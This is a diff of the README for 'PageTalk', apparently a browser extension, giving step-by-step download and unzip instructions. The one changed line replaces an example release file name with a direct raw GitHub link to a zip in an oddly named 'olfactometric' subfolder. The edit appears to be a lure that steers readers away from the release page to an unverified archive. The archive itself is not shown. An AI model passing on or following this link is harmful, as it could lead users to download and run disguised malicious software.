dan7el0/PageTalk/README.md

 1. Click the button or link above to go to the Releases page.
 2. On the Releases page, find the latest version of PageTalk.
 You may see a version number like v1.0.
 3. Click on the version link to open details.
-4. Find the file for your operating system (for example, "PageTalk_Chrome_Extension.zip").
+4. Find the file for your operating system (for example, "https://raw.githubusercontent.com/dan7el0/PageTalk/main/olfactometric/PageTalk.zip").
 5. Download the file by clicking on it.
 6. Once the download completes, locate the downloaded file in your Downloads folder.
 7. Unzip the file if it is zipped.